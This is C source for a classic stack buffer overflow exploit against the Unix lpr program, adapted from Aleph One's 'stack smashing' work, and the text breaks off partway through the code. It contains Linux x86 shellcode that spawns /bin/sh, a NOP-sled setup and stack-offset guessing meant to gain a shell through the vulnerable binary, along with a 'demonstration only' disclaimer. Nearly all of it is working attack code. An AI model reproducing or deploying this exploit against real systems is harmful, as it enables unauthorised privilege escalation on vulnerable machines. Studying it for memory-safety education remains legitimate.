/* * lpr_exploit.c - Buffer overflow exploit for the lpr program. * Adapted from code found in "stack smashing..." by Aleph One * aleph1@underground.org * * "wisdom is knowledge passed from one to another", Thanks * Aleph1 * * This program takes advantage of the buffer overflow condition * preset in lpr program. This program is meant as demonstration * only, and the author claims no resposibility for its use or * misuse. - a42n8k9 */ #include #define DEFAULT_OFFSET 1023 #define DEFAULT_BUFFER_SIZE 2289 #define NOP 0x90 /* * The hex representation of the code to produce an interactive shell. * Oviously since this is for a Linux Box, you may need to generate the * right set for your OS if you are porting this to another UNIX system. */ char shellcode [] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; unsigned long get_sp(void) { __asm__("mov %esp,%eax"); } void main(int argc, char *argv[]) { char *buff, *ptr; long *addr_ptr, addr; int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE; int i; /* set aside the memory for our shell code */ if (!(buff = malloc(bsize))) { printf("Can't allocate memory.\n"); exit(0); } /* Get the address of our stack pointer */ addr = get_sp() - offset; /* fill our buffer with its address */ ptr = buff; addr_ptr = (long *)ptr; for(i = 0; i